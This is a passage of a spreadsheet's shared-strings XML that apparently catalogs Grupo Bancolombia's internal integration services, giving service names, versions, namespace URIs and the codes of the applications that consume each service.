  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/GrabarParticipante/Enlace/V5.0</t>
  </si>
  <si>
    <t>RecuperarIdCliente</t>
  </si>
  <si>
    <t>3.0</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/RecuperarIdCliente/Enlace/V3.0</t>
  </si>
  <si>
    <t>AW0227001;AW0718001;;AW0628001</t>
  </si>
  <si>
    <t>RecuperarCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/VinculacionClientes/RecuperarCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0718001;AW0628001;AW0683001</t>
  </si>
  <si>
    <t>RecuperarTasaCambio</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Tesoreria/PortafolioFinanciero/RecuperarTasaCambio/Enlace/V1.0</t>
  </si>
  <si>
    <t>GenerarCodigoSeguridad</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/GenerarCodigoSeguridad/Enlace/V1.0</t>
  </si>
  <si>
    <t>RecuperarFiliales</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/Sucursales/RecuperarFiliales/Enlace/V1.0</t>
  </si>
  <si>
    <t>CambiarClaveSVE</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtualEmpresas/CambiarClaveSVE/Enlace/V2.0</t>
  </si>
  <si>
    <t>CancelarCanalSVE</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtualEmpresas/CancelarCanalSVE/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarCobroComision</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ConsultarCobroComision/Enlace/V1.0</t>
  </si>
  <si>
    <t>EliminarUsuario</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/EliminarUsuario/Enlace/V1.0</t>
  </si>
  <si>
    <t>AsignarPrimeraSegundaClaveSVP</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtualPersonas/AsignarPrimeraSegundaClaveSVP/Enlace/V3.0</t>
  </si>
  <si>
    <t>RegenerarClaveSVE</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtualEmpresas/RegenerarClaveSVE/Enlace/V2.0</t>
  </si>
  <si>
    <t>AccederAcuerdoTrade</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Productos/ComercioExterior/AccederAcuerdoTrade/Enlace/V3.0</t>
  </si>
  <si>
    <t>AW0360;AW0504001</t>
  </si>
  <si>
    <t>AccederNegociacionesDeDivisas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/MercadeoProductosYCanales/Canales/AccederNegociacionesDeDivisas/Enlace/V1.0</t>
  </si>
  <si>
    <t>ActivarAcuerdoTrade</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Productos/ComercioExterior/ActivarAcuerdoTrade/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0795</t>
  </si>
  <si>
    <t>ActivarCDT</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/SegmentosdePersonas/AhorroeInversionPersonas/ActivarCDT/Enlace/V1.0</t>
  </si>
  <si>
    <t>SU2;SVE;SVP;CDT;SU5</t>
  </si>
  <si>
    <t>AdministracionComboDinamico</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/Relacionamiento/AdministracionComboDinamico/Enlace/V1.0</t>
  </si>
  <si>
    <t>BV2;CIB;CDC;AW0748001</t>
  </si>
  <si>
    <t>AdministracionConveniosCartera</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CreditoConsumo/AdministracionConveniosCartera/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0856;AW1285001;AW0360007</t>
  </si>
  <si>
    <t>AdministracionITC</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canal/Comun/AdministracionITC/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1165;PRECONSTRUCCIONPDN;PRECONSTRUCCIONCERT</t>
  </si>
  <si>
    <t>AdministrarCDT</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/SegmentosdePersonas/AhorroeInversionPersonas/AdministrarCDT/Enlace/V1.0</t>
  </si>
  <si>
    <t>SU2;GDE;SVE;APP;SVP;CDT;SU5</t>
  </si>
  <si>
    <t>AfectacionMonetariaAFC</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Depositos/AfectacionMonetariaAFC/Enlace/V1.0</t>
  </si>
  <si>
    <t>SAI;AFC;GOLF</t>
  </si>
  <si>
    <t>AfectacionMonetariaCuentasACH</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/AfectacionMonetariaCuentasACH/Enlace/V1.0</t>
  </si>
  <si>
    <t>PRECONSTRUCCIONPDN;PRECONSTRUCCIONPDN</t>
  </si>
  <si>
    <t>AfectacionMonetariaDepositos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Depositos/AfectacionMonetariaDepositos/Enlace/V1.0</t>
  </si>
  <si>
    <t>AFC;AW0638;AW1110001;AW01065;AW1011</t>
  </si>
  <si>
    <t>AlmacenarSolicitudDeCredito_BB11</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosAdministrativos/ServiciosdeInformacionDocumental/AlmacenarSolicitudDeCredito_BB11/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0922;AW0856;AW0499</t>
  </si>
  <si>
    <t>ArquearDocumentos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/GestionDocumental/GestionDocumental/ArquearDocumentos/Enlace/V1.0</t>
  </si>
  <si>
    <t>AutenticacionClienteDIAN</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Externos/DIAN/AutenticacionClienteDIAN/Enlace/V1.0</t>
  </si>
  <si>
    <t>AutenticacionOauth</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Seguridad/Autenticacion/AutenticacionOauth/Enlace/V1.0</t>
  </si>
  <si>
    <t>AutenticacionSufi</t>
  </si>
  <si>
    <t>http://sufi.grupobancolombia.com/intf/Seguridad/Autenticacion/AutenticacionSufi/Enlace/V1.0</t>
  </si>
  <si>
    <t>AutenticarClienteOTP</t>
  </si>
  <si>
    <t>1.1</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/SeguridadCorporativa/Canales/AutenticarClienteOTP/Enlace/V1.1</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/SeguridadCorporativa/Canales/AutenticarClienteOTP/Enlace/V2.0</t>
  </si>
  <si>
    <t>APIC;AW1128;AW0937;AW1170</t>
  </si>
  <si>
    <t>BM_SVE_AccederAcuerdoTrade</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosDeDesarrollo/Integracion/BM_SVE_AccederAcuerdoTrade/Enlace/V1.0</t>
  </si>
  <si>
    <t>CargaDeArchivos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CashManagement/CargaDeArchivos/Enlace/V1.0</t>
  </si>
  <si>
    <t>SVE</t>
  </si>
  <si>
    <t>ComprarDivisas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Posicionpropia/DivisasyAdministracionRiesgoCambiario/ComprarDivisas/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConfirmarIdentidadPersonaEnDataCredito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/RiesgoDeCreditoBancaPersona/RiesgoSufi/ConfirmarIdentidadPersonaEnDataCredito/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1097001;AW1312001;AW0939;AW0638</t>
  </si>
  <si>
    <t>ConsultaCatalogoMaestros</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/transversalesTI/Informacion/ConsultaCatalogoMaestros/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaCentralesInternas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/GestionRiesgo/ConsultaCentralesInternas/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1086001;AW1081001</t>
  </si>
  <si>
    <t>ConsultaClientes</t>
  </si>
  <si>
    <t>http://factoring.grupobancolombia.com/intf/Producto/Comun/ConsultaClientes/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaConsolidadosCuentasDepositos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/ConsultaConsolidadosCuentasDepositos/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1170;PRECONSTRUCCIONPDN;PRECONSTRUCCIONCERT</t>
  </si>
  <si>
    <t>ConsultaCuentaDepositos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Depositos/ConsultaCuentaDepositos/Enlace/V2.0</t>
  </si>
  <si>
    <t>AW0709001;AW1170;AW1272001;AFC;AW0856;AW1176;AW1110001</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Depositos/ConsultaCuentaDepositos/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaCuentasAFC</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Depositos/ConsultaCuentasAFC/Enlace/V1.0</t>
  </si>
  <si>
    <t>GDE;AFC</t>
  </si>
  <si>
    <t>ConsultaDatosCartera</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Financiero/GestionRiesgoCorporativo/ConsultaDatosCartera/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1287;AW1176;AW1285001</t>
  </si>
  <si>
    <t>ConsultaDatosClienteSufi</t>
  </si>
  <si>
    <t>http://sufi.grupobancolombia.com/intf/transversalesTI/Informacion/ConsultaDatosClienteSufi/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaDatosComercialesSucursal</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/Comun/ConsultaDatosComercialesSucursal/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1128;AW1177;AW0856</t>
  </si>
  <si>
    <t>ConsultaDatosContactoCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/transversalesTI/Informacion/ConsultaDatosContactoCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaDatosFinancierosCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/transversalesTI/Informacion/ConsultaDatosFinancierosCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaDatosPersonalesCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/transversalesTI/Informacion/ConsultaDatosPersonalesCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>GDE;CIF;APP;SVP;AUD</t>
  </si>
  <si>
    <t>ConsultaDatosRelacionesCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/transversalesTI/Informacion/ConsultaDatosRelacionesCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaDatosTarjetaCredito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Tarjetas/ConsultaDatosTarjetaCredito/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaDeArchivos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CashManagement/ConsultaDeArchivos/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaDesembolsoCreditoPyme</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/canal/comun/ConsultaDesembolsoCreditoPyme/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1287;AW1170</t>
  </si>
  <si>
    <t>ConsultaDocumentosCuentaDepositos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/ConsultaDocumentosCuentaDepositos/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaExtractosCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/producto/comun/ConsultaExtractosCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaFondos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Inversion/ConsultaFondos/Enlace/V1.0</t>
  </si>
  <si>
    <t>SVE;AW1185001</t>
  </si>
  <si>
    <t>ConsultaFondosFiduciarios</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Inversion/ConsultaFondosFiduciarios/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaGestionComercialCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/transversalesTI/Informacion/ConsultaGestionComercialCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaGirosMulticanal</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/producto/CashManagement/ConsultaGirosMulticanal/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaGruposDeRiesgo</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/GestionRiesgo/ConsultaGruposDeRiesgo/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0922;AW1176</t>
  </si>
  <si>
    <t>ConsultaInformacionClienteEmpresarial</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/Conocimiento/ConsultaInformacionClienteEmpresarial/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0856;AW1176;APIC</t>
  </si>
  <si>
    <t>ConsultaInformacionEntregaTokenSVE</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Externos/Comun/ConsultaInformacionEntregaTokenSVE/Enlace/V1.0</t>
  </si>
  <si>
    <t>GDE;TP;Allus</t>
  </si>
  <si>
    <t>ConsultaInformacionFiscalYParafiscalDelCliente</t>
  </si>
  <si>
    <t>http://sufi.grupobancolombia.com/intf/Producto/CreditoCormercialConsumo/ConsultaInformacionFiscalYParafiscalDelCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1097001</t>
  </si>
  <si>
    <t>ConsultaInformacionFondosFiduciarios</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Inversion/ConsultaInformacionFondosFiduciarios/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaInformacionPrestamos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CreditoConsumo/ConsultaInformacionPrestamos/Enlace/V1.0</t>
  </si>
  <si>
    <t>PRECONSTRUCCIONPDN;PRECONSTRUCCIONCERT;AW0360007</t>
  </si>
  <si>
    <t>ConsultaInformacionPrestamosIWS</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CreditoConsumo/ConsultaInformacionPrestamosIWS/Enlace/V1.0</t>
  </si>
  <si>
    <t>PRECONSTRUCCIONPDN</t>
  </si>
  <si>
    <t>ConsultaInformacionRecaudos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CashManagement/ConsultaInformacionRecaudos/Enlace/V1.0</t>
  </si>
  <si>
    <t>GDE;SVE;APP;SVP</t>
  </si>
  <si>
    <t>ConsultaInformacionTarjetaCredito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Tarjetas/ConsultaInformacionTarjetaCredito/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1165;AW1170;PRECONSTRUCCIONPDN;PRECONSTRUCCIONCERT;APIC</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Tarjetas/ConsultaInformacionTarjetaCredito/Enlace/V1.1</t>
  </si>
  <si>
    <t>PRECONSTRUCCIONPDN;APIC</t>
  </si>
  <si>
    <t>ConsultaInformacionTokenSVE</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Externos/Comun/ConsultaInformacionTokenSVE/Enlace/V1.0</t>
  </si>
  <si>
    <t>GDE;STI;AW0922;TP;Allus</t>
  </si>
  <si>
    <t>ConsultaListasDeControl</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Financiero/GestionRiesgoCorporativo/ConsultaListasDeControl/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1302001;AW1311;AW1277001;AW0360009;AW1258002;AW1279001;AW1258001;AW1183001;SLT;AW0856;AW1176;AW0638;AW1203001</t>
  </si>
  <si>
    <t>ConsultaLlaveroCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/TransversalesTI/Informacion/ConsultaLlaveroCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaLmeFinacleFiliales</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Financiero/GestionRiesgoCorporativo/ConsultaLmeFinacleFiliales/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaLmeFinacleTrade</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Financiero/GestionRiesgoCorporativo/ConsultaLmeFinacleTrade/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaLmeLeasing</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Financiero/GestionRiesgoCorporativo/ConsultaLmeLeasing/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaMarcacionesPersonas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Externos/CentralesRiesgo/ConsultaMarcacionesPersonas/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaMetadataDocumental</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Corporativo/AdministracionDocumentos/ConsultaMetadataDocumental/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0659;AW1133</t>
  </si>
  <si>
    <t>ConsultaMmfFactoring</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Financiero/GestionRiesgoCorporativo/ConsultaMmfFactoring/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaMovimientoCuentaAhorroDeposito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/ConsultaMovimientoCuentaAhorroDeposito/Enlace/V1.1</t>
  </si>
  <si>
    <t>PRECONSTRUCCIONPDN;PRECONSTRUCCIONCERT;AW1272001</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/ConsultaMovimientoCuentaAhorroDeposito/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaMovimientoCuentaCorrienteDeposito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/ConsultaMovimientoCuentaCorrienteDeposito/Enlace/V1.1</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/ConsultaMovimientoCuentaCorrienteDeposito/Enlace/V1.0</t>
  </si>
  <si>
    <t>PRECONSTRUCCIONPDN;PRECONSTRUCCIONCERT;AW1170</t>
  </si>
  <si>
    <t>ConsultaMovimientosTarjetaCredito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Tarjetas/ConsultaMovimientosTarjetaCredito/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1170;PRECONSTRUCCIONPDN;PRECONSTRUCCIONCERT;APIC</t>
  </si>
  <si>
    <t>ConsultaObligacionesSufi</t>
  </si>
  <si>
    <t>http://sufi.grupobancolombia.com/intf/Producto/CreditoConsumo/ConsultaObligacionesSufi/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1312001;AW1209001</t>
  </si>
  <si>
    <t>ConsultaOperacionLeasingFinanciero</t>
  </si>
  <si>
    <t>http://leasing.grupobancolombia.com/intf/Producto/Colocacion/Leasing/ConsultaOperacionLeasingFinanciero/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaPagosOperacionLeasingFinanciero</t>
  </si>
  <si>
    <t>http://leasing.grupobancolombia.com/intf/Producto/Colocacion/Leasing/ConsultaPagosOperacionLeasingFinanciero/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaProductoDepositos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/ConsultaProductoDepositos/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1177;AW0856;AW0937;AW1011;AW0638;ELIBOM;AW1285001;BDT;AW1272001;BSN;SUF</t>
  </si>
  <si>
    <t>ConsultaProductoTarjetas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Tarjetas/ConsultaProductoTarjetas/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW01065;AW1176;BSN;AW1165;AW1170</t>
  </si>
  <si>
    <t>ConsultaProductosConsolidados</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Comun/ConsultaProductosConsolidados/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaProductosDelCliente</t>
  </si>
  <si>
    <t>http://factoring.grupobancolombia.com/intf/Producto/Comun/ConsultaProductosDelCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaProductosPagosCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Productos/Comun/ConsultaProductosPagosCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaRemesas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/ComercioExterior/ConsultaRemesas/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaSaldosCuentasDepositos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/ConsultaSaldosCuentasDepositos/Enlace/V3.0</t>
  </si>
  <si>
    <t>AW1316001;AW1316</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/ConsultaSaldosCuentasDepositos/Enlace/V2.0</t>
  </si>
  <si>
    <t>BSN;AW1165;AW1170;PRECONSTRUCCIONPDN;PRECONSTRUCCIONMGP;PRECONSTRUCCIONCERT;AW1272001</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/ConsultaSaldosCuentasDepositos/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1302001;AW1165;AW1170;APIC</t>
  </si>
  <si>
    <t>ConsultaTCRM</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Externos/SuperFinanciera/ConsultaTCRM/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1081001;AW1176;AW0937</t>
  </si>
  <si>
    <t>ConsultaTarjetasCredito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/MediosDePago/TarjetasDeCredito/ConsultaTarjetasCredito/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1165;AW1285001</t>
  </si>
  <si>
    <t>ConsultaTarjetasDelCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Comun/ConsultaTarjetasDelCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1189001</t>
  </si>
  <si>
    <t>ConsultaTarjetasPYME</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/MediosPago/TarjetasCredito/ConsultaTarjetasPYME/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaTasaCredito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CreditoConsumo/ConsultaTasaCredito/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0856;AW0937;AW1285001</t>
  </si>
  <si>
    <t>ConsultaTasaDeCambio</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Financiero/Comun/ConsultaTasaDeCambio/Enlace/V1.0</t>
  </si>
  <si>
    <t>SVP;AW0360;AW1011</t>
  </si>
  <si>
    <t>ConsultaVariablesPrecalculadasRiesgos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Riesgos/ConsultaVariablesPrecalculadasRiesgos/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarCentralesDeRiesgo</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/RiesgosdePersonasyPymes/AnalisisdeRiesgoCredito/ConsultarCentralesDeRiesgo/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarClientePrecalculado</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/GestionRiesgo/ConsultarClientesPrecalculados/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarCreditoHipotecario</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/InmobiliariayConstructor/EstructuracionyDesarrollodeProductosHipotecarios/ConsultarCreditoHipotecario/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW01010;GDE;SAI;SVP;SCI;AUD;APIC</t>
  </si>
  <si>
    <t>ConsultarDiscrepancias</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/FinanciacionyMonedaExtranjera/ProductosdeFinanciacionMLyME/ConsultarDiscrepancias/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0360;AW0611001</t>
  </si>
  <si>
    <t>AW0856;AW1151001;AW1128;AW0922;AW1177;AW1170;AW1011;AW0998;ELIBOM;AW0682001;AW11777;AW1097001;SYC;BSN;AW117</t>
  </si>
  <si>
    <t>ConsultarEstadoProveedoresListasControl</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosApoyo/GestionRiesgo/ConsultarEstadoProveedoresListasControl/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarFuentesPublicasExternas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/GestionRiesgo/ConsultaFuentesPublicasExternas/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0856;AW1097001;AW1081001;AW0922;AW0856;AW1170</t>
  </si>
  <si>
    <t>ConsultarListasControlEspeciales</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosApoyo/PrevencionLavadoActivos/ConsultarListasControlEspeciales/Enlace/V1.0</t>
  </si>
  <si>
    <t>SYC;AW0922</t>
  </si>
  <si>
    <t>ConsultarOTP</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/SeguridadCorporativa/Canales/ConsultarOTP/Enlace/V1.1</t>
  </si>
  <si>
    <t>AW0636;AW0638</t>
  </si>
  <si>
    <t>CorrelacionarTransacciones_BB6</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosAdministrativos/ServiciosdeInformacionDocumental/CorrelacionarTransacciones_BB6/Enlace/V1.0</t>
  </si>
  <si>
    <t>CreacionCasoConsultaLE</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Comun/CreacionCasoConsultaLE/Enlace/V1.0</t>
  </si>
  <si>
    <t>CrearNovedadProductoTrade</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/FinanciacionyMonedaExtranjera/ProductosdeFinanciacionMLyME/CrearNovedadProductoTrade/Enlace/V1.0</t>
  </si>
  <si>
    <t>CrearProductoTrade</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/FinanciacionyMonedaExtranjera/ProductosdeFinanciacionMLyME/CrearProductoTrade/Enlace/V1.0</t>
  </si>
  <si>
    <t>DesembolsoCreditoALaMano</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CreditoConsumo/DesembolsoCreditoALaMano/Enlace/V1.0</t>
  </si>
  <si>
    <t>ELIBOM</t>
  </si>
  <si>
    <t>DesembolsoCreditoConsumo</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CreditoConsumo/DesembolsoCreditoConsumo/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0856;AW0937;ELIBOM;AW1285001</t>
  </si>
  <si>
    <t>DigitalizacionDeDocumentos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Corporativo/AdministracionDocumentos/DigitalizacionDeDocumentos/Enlace/v1.0</t>
  </si>
  <si>
    <t>AW1011;AW0638;AW1203001</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Corporativo/AdministracionDocumentos/DigitalizacionDeDocumentos/Enlace/V2.0</t>
  </si>
  <si>
    <t>AW1011;AW0638;NEQUI</t>
  </si>
  <si>
    <t>DisponibilidadDivisas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/ComercioExterior/DisponibilidadDivisas/Enlace/V1.0</t>
  </si>
  <si>
    <t>EnrolarClienteOTP</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/SeguridadCorporativa/Canales/EnrolarClienteOTP/Enlace/V1.1</t>
  </si>
  <si>
    <t>AW1170;AW0638</t>
  </si>
  <si>
    <t>EnviarNotificacion</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/Internet/EnviarNotificacion/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1097001;AW0856;AW0937;AW0638;TP;AW1142001</t>
  </si>
  <si>
    <t>EnvioCorreoElectronico</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/Comun/EnvioCorreoElectronico/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0407;AW0398;PRECONSTRUCCIONPDN;AW1172001;AW1272001;AW1277001;AW0360009;APIC</t>
  </si>
  <si>
    <t>EnvioDataLiquidaPersona</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Corporativo/AdministracionDocumentos/EnvioDataLiquidaPersona/Enlace/V2.0</t>
  </si>
  <si>
    <t>AW1108001</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Corporativo/AdministracionDocumentos/EnvioDataLiquidaPersona/Enlace/V1.0</t>
  </si>
  <si>
    <t>EnvioMetadataDocumental</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Corporativo/AdministracionDocumentos/EnvioMetadataDocumental/Enlace/V1.0</t>
  </si>
  <si>
    <t>EnvioSmsInalambria</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canal/Comun/EnvioSmsInalambria/Enlace/V1.0</t>
  </si>
  <si>
